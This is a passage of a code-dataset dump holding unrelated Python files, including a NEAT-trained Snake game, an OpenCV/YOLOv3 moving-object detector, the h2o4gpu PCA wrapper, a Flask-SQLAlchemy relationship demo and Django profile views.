ready\n wait = WebDriverWait(self.driver, 10)\n wait.until(element_has_css_class((By.TAG_NAME, 'body'), \"baton-ready\"))\n\n # site title\n html = self.driver.find_element(By.CSS_SELECTOR, \"html\")\n self.assertEqual(\n html.get_attribute('data-bs-theme'), 'light')\n","sub_path":"testapp/app/app/tests/test_e2e_theme.py","file_name":"test_e2e_theme.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"474173512","text":"import pygame\nimport time\nimport random\nimport neat\nimport os\nimport math\n \npygame.init()\n \nwhite = (255, 255, 255)\nyellow = (255, 255, 102)\nblack = (0, 0, 0)\nred = (213, 50, 80)\ngreen = (0, 255, 0)\nblue = (50, 153, 213)\n \ndis_width = 230\ndis_height = 230\n \nbestscore1 = 0\n\ndis = pygame.display.set_mode((dis_width, dis_height))\npygame.display.set_caption('Snake Game by Taren P')\n \nclock = pygame.time.Clock()\n \nsnake_block = 10\nsnake_speed = 150\n \napple = pygame.image.load(os.path.join(\"Graphics\", \"apple.png\"))\napple = pygame.transform.scale(apple, (20, 20))\nfont_style = pygame.font.SysFont(\"bahnschrift\", 15)\nscore_font = pygame.font.SysFont(\"comicsansms\", 20)\n \ndef remove(index):\n snakes.pop(index)\n ge.pop(index)\n nets.pop(index)\n\ndef Your_score(score, y):\n global bestscore1\n text_1 = font_style.render(f'Snakes Alive: {str(len(snakes))}', True, white)\n dis.blit(text_1, [100, 210])\n value = score_font.render(\"Your Score: \" + str(score), True, yellow)\n dis.blit(value, [0, 0])\n if bestscore1 < score:\n bestscore1 = score\n value3 = font_style.render(f'Generation: {pop.generation+1}', True, white)\n dis.blit(value3, [0, 190])\n value2 = font_style.render(\"Best Score: \" + str(bestscore1), True, white)\n dis.blit(value2, [0, 210])\n\ndef find(lst, r):\n return [i for i, x in enumerate(lst) if x == r]\n \n \ndef our_snake(snake_block, snake_list):\n for x in snake_list:\n pygame.draw.rect(dis, green, [x[0], x[1], snake_block, snake_block])\n \ndef distance(pos_a, pos_b):\n dx = pos_a[0]-pos_b[0]\n dy = pos_a[1]-pos_b[1]\n return math.sqrt(dx**2+dy**2)\n\ndef truncate(n, decimals=0):\n multiplier = 10 ** decimals\n return int(n * multiplier) / multiplier\n\nscore = 0\ndef gameLoop(genomes, config, i, y):\n game_over = False\n game_close = False\n global score\n x1 = (dis_width / 2) + 5\n y1 = (dis_height / 2) + 5\n \n x1_change = 0\n y1_change = 0\n location = []\n amount = []\n counter = 0\n\n snake_List = []\n Length_of_snake = 3\n score = 0\n #x1_change = -snake_block\n foodx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n\n while not game_over:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n if x1 >= dis_width or x1 < 0 or y1 >= dis_height or y1 < 0:\n ge[i].fitness -= 10\n game_close = True\n x1 += x1_change\n y1 += y1_change\n dis.fill(blue)\n l = 0\n if foody == (dis_width/2) + 5:\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n if foodx == (dis_height/2) + 5:\n foodx = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n while l <= dis_width/10:\n pygame.draw.line(dis, black, (0, (dis_height / 23)*l), (dis_width, (dis_height / 23)*l))\n pygame.draw.line(dis, black, ((dis_width / 23)*l, 0), ((dis_width / 23)*l, dis_height))\n l+=1\n pygame.draw.rect(dis, red, [foodx, foody, snake_block, snake_block])\n dis.blit(apple, (foodx-5, foody -5.7))\n 
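# Added note: the apple sprite was scaled to 20x20 above while a food block is\n # 10x10, so the blit offsets by about half the difference to centre the image.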
snake_Head = []\n snake_Head.append(x1)\n snake_Head.append(y1)\n snake_List.append(snake_Head)\n if len(snake_List) > Length_of_snake:\n del snake_List[0]\n \n for x in snake_List[:-1]:\n if x == snake_Head:\n ge[i].fitness -= 10\n game_close = True\n output = nets[i].activate((distance((x1, y1), (foodx, foody)), Length_of_snake, x1, y1, dis_width, foodx, foody))\n if output[0] > 0.5:\n x1_change = -snake_block\n y1_change = 0\n if output[1] > 0.5:\n x1_change = snake_block\n y1_change = 0\n if output[2] > 0.5:\n y1_change = -snake_block\n x1_change = 0\n if output[3] > 0.5:\n y1_change = snake_block\n x1_change = 0\n location.append(distance((x1, y1), (foodx, foody)))\n if len(location) > 100:\n del location[0]\n for r in location:\n amount = find(location, r)\n if len(amount) > 2:\n ge[i].fitness -= 10\n game_close = True\n our_snake(snake_block, snake_List)\n Your_score(Length_of_snake - 3, y)\n pygame.display.update()\n if x1 == foodx and y1 == foody:\n foodx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n Length_of_snake += 1\n if counter > 12:\n ge[i].fitness += 0.3\n clock.tick(snake_speed)\n if game_close == True:\n score = Length_of_snake -3\n ge[i].fitness += score*20\n # print(ge[i].fitness)\n remove(i)\n break\n \ndef eval_genomes(genomes, config):\n global snakes, ge, nets, i\n snakes = []\n ge = []\n nets = []\n y = 0\n for genome_id, genome in genomes:\n snakes.append(\"snake\")\n ge.append(genome)\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n nets.append(net)\n genome.fitness = 0\n while y<= 10000000:\n for i, snake in enumerate(snakes):\n gameLoop(genomes, config, i, y)\n y += 1\n\ndef run(config_path):\n global pop\n config = neat.config.Config(\n neat.DefaultGenome,\n neat.DefaultReproduction,\n neat.DefaultSpeciesSet,\n neat.DefaultStagnation,\n config_path\n )\n\n pop = neat.Population(config)\n pop.run(eval_genomes, 10000000000)\n\n\nif __name__ == '__main__':\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config.txt')\n run(config_path)","sub_path":"Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":6093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"164681903","text":"from operator import itemgetter\nimport pandas as pd\n\niter=0\nwhile iter<100:\n data = pd.read_csv(\"result/set2/scores/rwr_result_set2_\"+str(iter)+\".txt\",delim_whitespace=\"\",header=None)\n list = []\n col1 = data[0]\n col2 = data[1]\n col3 = data[2]\n\n for i in range(len(data[0])):\n list.append((col1[i],col2[i],col3[i]))\n sort = sorted(list,key = lambda x:x[1],reverse=True)\n \n fp = open(\"result/set2/scores/rwr_result_set2_\"+str(iter)+\".txt\",\"w\")\n for i in range(len(sort)):\n row = sort[i]\n fp.write(str(row[0])+\",\"+str(row[1])+\",\"+str(row[2])+\"\\n\")\n iter+=1\n","sub_path":"prioritization_methods/rwr/randomize2/sort_res.py","file_name":"sort_res.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"437234155","text":"from Resultado import Resultado\nfrom Simulacion import Simulacion\nimport Operaciones\nimport os\nimport shutil\n\nmayoresGanancias = []\n\n\ndef CalculoSimulacion(rangoIni, rangoFinal, iteraciones):\n for i in range(1,iteraciones+1):\n simulacion = Simulacion(i)\n for mes in range(1,31):\n for revista in range(rangoIni, rangoFinal+1):\n resultado = 
Resultado(mes, revista)\n simulacion.AgregarResultado(resultado)\n\n simulacion.Imprimir()\n mayoresGanancias.append(simulacion.Get_GananciaMayor())\n\n Operaciones.ImprimirGanancias(mayoresGanancias)\n \ndef IniciarPrograma():\n try:\n print('Simulacion de la segunda política, desde el numero inicial de revistas x hasta y: \\n')\n iteraciones = int(input('Ingrese el número de simulaciones que deseas realizar:'))\n revistaInicial = int(input('Ingrese mínimo de número de revistas inicial:'))\n revistaFinal = int(input('Ingrese el máximo de revistas iniciales:'))\n\n if revistaFinal < revistaInicial:\n print('Ingrese un rango valido.')\n else:\n CalculoSimulacion(revistaInicial, revistaFinal, iteraciones)\n except Exception as e: \n print(\"Ha ocurrido un error por favor intente nuevamente\")\n print(\"Detalle del error:\", e)\n\nerror = False\nfolder = 'output/'\nfor the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception:\n if error is False:\n print(\"El programa no ha podido eliminar todos los archivos excel, por favor cierrelos e intente nuevamente.\")\n error = True\n\nif error is False:\n IniciarPrograma()\n\n\n\n","sub_path":"politicaUno/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"341797997","text":"import cv2 as cv \nimport numpy as np \nimport random as rng\nimport darknet\nimport os\n\nrng.seed(12345)\n\nvideoPath = \"VID.mp4\"\nconfigPath = \"YOLOv3/yolov3.cfg\"\nweightPath = \"YOLOv3/yolov3.weights\"\n# configPath = \"YOLOv3/yolov3-tiny.cfg\"\n# weightPath = \"YOLOv3/yolov3-tiny.weights\"\nclassesPath = \"YOLOv3/coco.names\"\n\nif not os.path.exists(videoPath):\n raise ValueError(\"Invalid video path `\" + os.path.abspath(videoPath) + \"`\")\nif not os.path.exists(configPath):\n raise ValueError(\"Invalid config path `\" + os.path.abspath(configPath) + \"`\")\nif not os.path.exists(weightPath):\n raise ValueError(\"Invalid weight path `\" + os.path.abspath(weightPath) + \"`\")\nif not os.path.exists(classesPath):\n raise ValueError(\"Invalid classes path `\" + os.path.abspath(classesPath) + \"`\")\n\nwith open(classesPath, 'rt') as f:\n classes = f.read().rstrip('\\n').split('\\n')\n\nconfThreshold = 0.5\nnmsThreshold = 0.4\ninpWidth = 320\ninpHeight = 320\n\nnet = cv.dnn.readNetFromDarknet(configPath, weightPath)\nnet.setPreferableBackend(cv.dnn.DNN_BACKEND_OPENCV)\nnet.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)\n# Get the names of the output layers\ndef getOutputsNames(net):\n layersNames = net.getLayerNames()\n return [layersNames[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n# Return the bounding box with the highest confidence\n# This function is no longer used\ndef process(outs):\n classIds = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > confThreshold:\n classIds.append(classId)\n confidences.append(float(confidence))\n \n if len(classIds) != 0:\n index = np.argsort(confidences)[-1]\n classId = classIds[index]\n # print(classes[classId], f'{confidences[index]:.2f}')\n label = f'{classes[classId]} {confidences[index]:.2f}'\n return label\n return None\n\ndef postProcess(roi, outs):\n height, width, channel = roi.shape\n classIds = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n classId = np.argmax(scores)\n confidence = 
scores[classId]\n if confidence > confThreshold:\n center_x = (int)(detection[0] * width)\n center_y = (int)(detection[1] * height)\n box_width = (int)(detection[2] * width)\n box_height = (int)(detection[3] * height)\n left = (int)(center_x - box_width / 2)\n top = (int)(center_y - box_height / 2)\n classIds.append(classId)\n confidences.append((float)(confidence))\n boxes.append([left, top, box_width, box_height])\n box_result = []\n conf_result = []\n class_result = []\n index = cv.dnn.NMSBoxes(boxes, confidences, confThreshold, nmsThreshold)\n for i in index:\n i = i[0]\n box_result.append(boxes[i])\n conf_result.append(confidences[i])\n class_result.append(classes[classIds[i]])\n \n print(class_result)\n return box_result, conf_result, class_result\n\ndef transform(box, roi_x, roi_y):\n for b in box:\n b[0] += roi_x\n b[1] += roi_y\n\n\nsurf = cv.xfeatures2d.SURF_create(1000)\n# surf = cv.xfeatures2d.SURF_create()\nFLANN_INDEX_KDTREE = 1\nMIN_MATCH_COUNT = 10\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks = 32)\nflann = cv.FlannBasedMatcher(index_params, search_params)\n\ncv.namedWindow(\"match\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"frame1\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"frame2\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"after dilate\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"draw contours\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"kp\", cv.WINDOW_NORMAL)\ncv.namedWindow(\"dst\", cv.WINDOW_NORMAL)\n\ncapture = cv.VideoCapture(videoPath)\nif not capture.isOpened():\n print(\"can not open the video\")\n exit()\n\nkernel = cv.getStructuringElement(cv.MORPH_RECT, (5, 5))\nret, frame2 = capture.read()\nrows, cols, ch = frame2.shape\nprint(\"rows = \", rows, \" cols = \", cols)\nframe2_gray = cv.cvtColor(frame2, cv.COLOR_BGR2GRAY)\nframe2_gray = cv.blur(frame2_gray, (5, 5))\nkp2, des2 = surf.detectAndCompute(frame2_gray, None)\n\n\nRECT_MIN_WIDTH = 20\nRECT_MIN_HIGHT = 20\n\n# test = True\ntest = False\n\nwhile True:\n frame1 = frame2\n frame1_gray = frame2_gray\n kp1 = kp2\n des1 = des2\n\n ret, frame2 = capture.read()\n if not ret:\n break\n \n frame2_gray = cv.cvtColor(frame2, cv.COLOR_BGR2GRAY)\n frame2_gray = cv.blur(frame2_gray, (5, 5))\n\n # kp1, des1 = surf.detectAndCompute(frame1, None)\n kp2, des2 = surf.detectAndCompute(frame2_gray, None)\n\n # Draw the detected feature points\n # kp_img = frame2.copy()\n # kp_img = cv.drawKeypoints(kp_img, kp2, kp_img)\n # cv.imshow(\"kp\", kp_img)\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/key_points.jpg\", kp_img)\n # print(\"OK\");\n\n matches = flann.knnMatch(des1, des2, k = 2)\n # print(len(matches))\n good = []\n for m, n in matches:\n if m.distance < 0.7 * n.distance:\n good.append(m)\n if len(good) > MIN_MATCH_COUNT:\n frame1_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n frame2_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n M, mask = cv.findHomography(frame1_pts, frame2_pts, cv.RANSAC, 5.0)\n if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n print(M)\n \n matches_mask = mask.ravel().tolist()\n \n warp = cv.warpPerspective(frame1, M, (cols, rows))\n # cv.imshow(\"warp\", warp);\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/warp.jpg\", warp)\n # print(\"OK\")\n\n sub = cv.absdiff(frame2, warp)\n # cv.imshow(\"sub\", sub)\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/sub.jpg\", sub)\n # print(\"OK\")\n\n sub = sub[20:rows - 20, 20:cols - 20]\n\n # con_img = 
sub.copy()\n\n # Experiments showed that thresholding first and then converting to grayscale\n # works better than converting to grayscale first and then thresholding\n ret2, dst = cv.threshold(sub, 50, 255, cv.THRESH_BINARY)\n dst_gray = cv.cvtColor(dst, cv.COLOR_BGR2GRAY)\n # dst_gray = cv.cvtColor(sub, cv.COLOR_BGR2GRAY)\n # ret2, dst_gray = cv.threshold(dst_gray, 80, 255, cv.THRESH_BINARY)\n\n # cv.imshow(\"threshold\", dst_gray)\n\n dst_gray = cv.morphologyEx(dst_gray, cv.MORPH_DILATE, kernel)\n dst_gray = cv.morphologyEx(dst_gray, cv.MORPH_DILATE, kernel)\n cv.imshow(\"after dilate\", dst_gray)\n if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n cv.imwrite(\"pic/dilate.jpg\", dst_gray)\n print(\"OK\")\n\n # edges = cv.Canny(dst, 300, 450)\n # cv.imshow(\"edges\", edges)\n contours, hierarchy = cv.findContours(dst_gray, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n # cv.drawContours(con_img, contours, -1, 255, 1)\n # cv.imshow(\"draw contours\", con_img)\n if hierarchy is None:\n continue\n \n temp = frame2[20:rows - 20, 20:cols - 20].copy()\n for c in contours:\n rect = cv.boundingRect(c)\n color = (rng.randint(0, 255), rng.randint(0, 255), rng.randint(0, 255))\n x, y, w, h = rect\n # if cv.contourArea(c) > 200 and w < RECT_MAX_WIDTH and h < RECT_MAX_HIGHT \\\n # and w > RECT_MIN_WIDTH and h > RECT_MIN_HIGHT and w * h > 5000:\n if cv.contourArea(c) > 200 and w > RECT_MIN_WIDTH and h > RECT_MIN_HIGHT and w * h > 5000:\n label = None\n box = []\n if not test:\n roi = temp[y:y+h, x:x+w]\n blob = cv.dnn.blobFromImage(roi, 1/255, (inpWidth, inpHeight), [0, 0, 0], 1, crop=False)\n net.setInput(blob)\n outputName = getOutputsNames(net)\n outs = net.forward(outputName)\n # label = process(outs)\n box, conf, cla = postProcess(roi, outs)\n transform(box, x, y)\n t, _ = net.getPerfProfile()\n # print(\"Inference time: %.2f ms\" % (t * 1000.0 / cv.getTickFrequency()))\n\n if len(box) > 0:\n for i, b in enumerate(box):\n label = f'{cla[i]} {conf[i]:.2f}'\n tex_size, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)\n cv.rectangle(temp, (b[0], b[1]), (b[0] + b[2], b[1] + b[3]), color, 2)\n cv.rectangle(temp, (b[0], b[1] - tex_size[1]), (b[0] + tex_size[0], b[1]), color, cv.FILLED)\n cv.putText(temp, label, (b[0], b[1]), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)\n else:\n cv.rectangle(temp, (x, y), (x + w, y + h), color, 2)\n # if label and not test:\n # text_size, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)\n # cv.rectangle(temp, (x, y - text_size[1]), (x + text_size[0], y), color, cv.FILLED)\n # cv.putText(temp, label, (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)\n totalFrame = (int)(capture.get(cv.CAP_PROP_FRAME_COUNT))\n frameNum = (int)(capture.get(cv.CAP_PROP_POS_FRAMES))\n if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n cv.imwrite(\"pic/rect3.jpg\", temp)\n print(\"OK\")\n text = \"current frame: \" + str(frameNum) + \"/\" + str(totalFrame)\n cv.putText(temp, text, (5, 20), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 1)\n cv.imshow(\"dst\", temp)\n\n else:\n print(\"not enough matches are found - {}/{}\".format(len(good), MIN_MATCH_COUNT))\n matches_mask = None\n \n # draw_params = dict(matchColor = (0, 255, 0),\n # singlePointColor = None,\n # matchesMask = matches_mask,\n # flags = 2)\n # match = cv.drawMatches(frame1, kp1, frame2, kp2, good, None, **draw_params)\n\n # cv.imshow(\"match\", match)\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/match.jpg\", match)\n # print(\"OK\")\n\n key = cv.waitKey(20)\n if key == ord('q'):\n break\n if key == ord('s'):\n cv.imwrite(\"pic/absdiff.jpg\", sub)\n if 
key == ord('m'):\n cv.imwrite(\"pic/match.jpg\", match)\n if key == ord('t'):\n cv.imwrite(\"pic/threshold.jpg\", dst_gray)\n \ncapture.release()\ncv.destroyAllWindows()\n\n","sub_path":"main_yolov3.py","file_name":"main_yolov3.py","file_ext":"py","file_size_in_byte":10760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"299437490","text":"# - * - encoding : utf - 8 - * -\n\"\"\"\n:copyright: 2017 H2O.ai, Inc.\n:license: Apache License Version 2.0 (see LICENSE for details)\n\"\"\"\nimport numpy as np\nfrom ..libs.lib_pca import parameters\nfrom ..solvers.utils import _setter\nfrom ..solvers.truncated_svd import TruncatedSVDH2O, TruncatedSVD, _as_fptr\nfrom ..utils.extmath import svd_flip\n\n\nclass PCAH2O(TruncatedSVDH2O):\n \"\"\"Principal Component Analysis (PCA)\n\n Dimensionality reduction using truncated Singular Value Decomposition\n for GPU\n\n This implementation uses the ARPACK implementation of the truncated SVD.\n Contrary to SVD, this estimator does center the data before computing\n the singular value decomposition.\n\n :param: n_components Desired dimensionality of output data\n\n :param: whiten : bool, optional\n When True (False by default) the `components_` vectors are multiplied\n by the square root of (n_samples) and divided by the singular values to\n ensure uncorrelated outputs with unit component-wise variances.\n\n Whitening will remove some information from the transformed signal\n (the relative variance scales of the components) but can sometime\n improve the predictive accuracy of the downstream estimators by\n making their data respect some hard-wired assumptions.\n \"\"\"\n\n def __init__(self, n_components=2, whiten=False):\n super().__init__(n_components)\n self.whiten = whiten\n self.n_components_ = n_components\n self.mean_ = None\n self.noise_variance_ = None\n\n # pylint: disable=unused-argument\n def fit(self, X, y=None):\n \"\"\"Fit PCA on matrix X.\n\n :param: X {array-like, sparse matrix}, shape (n_samples, n_features)\n Training data.\n\n :param y Ignored, for ScikitLearn compatibility\n\n :returns self : object\n\n \"\"\"\n self.fit_transform(X)\n return self\n\n # pylint: disable=unused-argument\n def fit_transform(self, X, y=None):\n \"\"\"Fit PCA on matrix X and perform dimensionality reduction\n on X.\n\n :param: X {array-like, sparse matrix}, shape (n_samples, n_features)\n Training data.\n\n :param: y Ignored, for ScikitLearn compatibility\n\n :returns X_new : array, shape (n_samples, n_components)\n Reduced version of X. 
This will always be a\n dense array.\n\n \"\"\"\n X = np.asfortranarray(X, dtype=np.float64)\n Q = np.empty(\n (self.n_components, X.shape[1]), dtype=np.float64, order='F')\n U = np.empty(\n (X.shape[0], self.n_components), dtype=np.float64, order='F')\n w = np.empty(self.n_components, dtype=np.float64)\n explained_variance = np.empty(self.n_components, dtype=np.float64)\n explained_variance_ratio = np.empty(self.n_components, dtype=np.float64)\n mean = np.empty(X.shape[1], dtype=np.float64)\n param = parameters()\n param.X_m = X.shape[0]\n param.X_n = X.shape[1]\n param.k = self.n_components\n param.whiten = self.whiten\n\n lib = self._load_lib()\n lib.pca(\n _as_fptr(X), _as_fptr(Q), _as_fptr(w), _as_fptr(U),\n _as_fptr(explained_variance), _as_fptr(explained_variance_ratio),\n _as_fptr(mean), param)\n\n self._w = w\n self._U, self._Q = svd_flip(U, Q) # TODO Port to cuda?\n self._X = X\n n = X.shape[0]\n # To match sci-kit #TODO Port to cuda?\n self.explained_variance = self.singular_values_**2 / (n - 1)\n self.explained_variance_ratio = explained_variance_ratio\n self.mean_ = mean\n\n # TODO noise_variance_ calculation\n # can be done inside lib.pca if a bottleneck\n n_samples, n_features = X.shape\n total_var = np.var(X, ddof=1, axis=0)\n if self.n_components_ < min(n_features, n_samples):\n self.noise_variance_ = \\\n (total_var.sum() - self.explained_variance_.sum())\n self.noise_variance_ /= \\\n min(n_features, n_samples) - self.n_components\n else:\n self.noise_variance_ = 0.\n\n X_transformed = U * w\n return X_transformed\n\n # Util to load gpu lib\n def _load_lib(self):\n from ..libs.lib_pca import GPUlib\n\n gpu_lib = GPUlib().get()\n\n return gpu_lib\n\n\nclass PCA(TruncatedSVD):\n \"\"\"\n PCA Wrapper\n\n Selects between h2o4gpu.decomposition.PCASklearn\n and h2o4gpu.solvers.pca.PCAH2O\n\n Documentation:\n import h2o4gpu.decomposition ;\n help(h2o4gpu.decomposition.PCASklearn)\n help(h2o4gpu.solvers.pca.PCA)\n\n :param: backend : Which backend to use. Options are 'auto', 'sklearn',\n 'h2o4gpu'. Default is 'auto'.\n Saves as attribute for actual backend used.\n\n \"\"\"\n\n # pylint: disable=unused-argument\n def __init__(self,\n n_components=2,\n copy=True,\n whiten=False,\n svd_solver=\"arpack\",\n tol=0.,\n iterated_power=\"auto\",\n random_state=None,\n verbose=False,\n backend='auto'):\n super().__init__(n_components, random_state, tol, verbose, backend)\n self.svd_solver = svd_solver\n self.whiten = whiten\n\n import os\n _backend = os.environ.get('H2O4GPU_BACKEND', None)\n if _backend is not None:\n backend = _backend\n\n # Fall back to Sklearn\n # Can remove if fully implement sklearn functionality\n self.do_sklearn = False\n if backend == 'auto':\n params_string = [\n 'svd_solver', 'random_state', 'tol', 'iterated_power'\n ]\n params = [svd_solver, random_state, tol, iterated_power]\n params_default = ['arpack', None, 0., 'auto']\n\n i = 0\n for param in params:\n if param != params_default[i]:\n self.do_sklearn = True\n if verbose:\n print(\"WARNING:\"\n \" The sklearn parameter \" + params_string[i] +\n \" has been changed from default to \" +\n str(param) + \". 
Will run Sklearn PCA.\")\n self.do_sklearn = True\n i = i + 1\n elif backend == 'sklearn':\n self.do_sklearn = True\n elif backend == 'h2o4gpu':\n self.do_sklearn = False\n if self.do_sklearn:\n self.backend = 'sklearn'\n else:\n self.backend = 'h2o4gpu'\n\n from h2o4gpu.decomposition.pca import PCASklearn\n self.model_sklearn = PCASklearn(\n n_components=n_components,\n copy=copy,\n whiten=whiten,\n svd_solver=svd_solver,\n tol=tol,\n iterated_power=iterated_power,\n random_state=random_state)\n self.model_h2o4gpu = PCAH2O(n_components=n_components, whiten=whiten)\n\n if self.do_sklearn:\n self.model = self.model_sklearn\n else:\n self.model = self.model_h2o4gpu\n\n def set_attributes(self):\n s = _setter(oself=self, e1=NameError, e2=AttributeError)\n s('oself.components_ = oself.model.components_')\n s('oself.explained_variance_= oself.model.explained_variance_')\n s('oself.explained_variance_ratio_ = '\n 'oself.model.explained_variance_ratio_')\n s('oself.singular_values_ = oself.model.singular_values_')\n s('oself.mean_ = oself.model.mean_')\n s('oself.n_components_ = oself.model.n_components_')\n s('oself.noise_variance_ = oself.model.noise_variance_')\n","sub_path":"src/interface_py/h2o4gpu/solvers/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"233540736","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\n# 配置数据库连接地址\napp.config['SQLALCHEMY_DATABASE_URI'] = \"mysql://root:mysql@127.0.0.1:3306/test_27\"\n# 是否追踪数据库的修改\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# 初始化 SQLAlchemy 对象\ndb = SQLAlchemy(app)\n\n\n# 角色 1的一方\nclass Role(db.Model):\n # 指定该模型对应数据库中的表名,如果不指定为类名小写\n __tablename__ = \"roles\"\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), unique=True)\n # backref 在这行代码的作用是:给前面的 User添加一个属性,名字叫backref的值\n # 以便可以直接通过 user.role 方法到一的一方的数据\n users = db.relationship('User', backref='role')\n\n def __repr__(self):\n return 'Role %d %s' % (self.id, self.name)\n\n# service mysql restart\n# service mysql stop\n# service mysql start\n# 用户 多的一方\nclass User(db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), unique=True)\n # 添加外键记录一的一方的主键id,为了能够直接查询出一的一方的数据\n role_id = db.Column(db.Integer, db.ForeignKey(Role.id))\n\n def __repr__(self):\n return 'User %d %s' % (self.id, self.name)\n\n\n\n\n\n# 需求,查询user所对应的role数据\n# select * from role where id = user.role_id\n\n# 需求,查询role所对应的所有user数据\n# select * from user where role_id = role.id\n\n@app.route('/')\ndef index():\n return 'index'\n\n\nif __name__ == '__main__':\n db.drop_all()\n db.create_all()\n\n ro1 = Role(name='admin')\n ro2 = Role(name='user')\n db.session.add_all([ro1, ro2])\n db.session.commit()\n\n user1 = User(name='laowang', role_id=ro1.id)\n user2 = User(name='laoli', role_id=ro1.id)\n user3 = User(name='laozhang', role_id=ro2.id)\n\n db.session.add_all([user1, user2, user3])\n db.session.commit()\n\n app.run(debug=True)\n","sub_path":"Flask_Demo_All/Flask_day03/demo6_sqlalchemy.py","file_name":"demo6_sqlalchemy.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"402969648","text":"from django.shortcuts import render, redirect\nfrom med.models import Manager, Engineer, Doctor\nfrom django.contrib.auth.decorators import login_required\nfrom .forms 
import UserUpdateForm\n\n\n# Create your views here.\ndef home(request):\n # try : \n #print(x) not defind\n #except:\n #print('error') excute\n try:\n if(request.user.type == 'ENGINEER'):\n eng = Engineer.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/home.html', context={'user' : eng})\n elif(request.user.type == 'DOCTOR'):\n doc = Doctor.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/home.html', context={'user' : doc})\n elif(request.user.type =='MANAGER'):\n man = Manager.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/home.html', context={'user' : man})\n except:\n return render(request, template_name='dashboard/HomePage.html')\n \n \n@login_required\ndef profile(request):\n if(request.user.type == 'ENGINEER'):\n eng = Engineer.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/profile.html', context={'user' : eng})\n elif(request.user.type == 'DOCTOR'):\n doc = Doctor.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/profile.html', context={'user' : doc})\n else:\n return render(request, template_name='dashboard/profile.html')\n\n@login_required\ndef update_profile(request):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST,request.FILES, instance=request.user)\n if u_form.is_valid():\n u_form.save()\n # messages.success(request, f'Account Info Updated!!')\n return redirect('profile')\n else:\n # messages.faliure(request, f'An error has occured!')\n return redirect('profile')\n \n context = {\n 'u_form' : UserUpdateForm(instance=request.user),\n }\n return render(request, \"dashboard/update_profile.html\", context) ","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"180253337","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom sqlalchemy import MetaData, create_engine\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom collections import namedtuple, 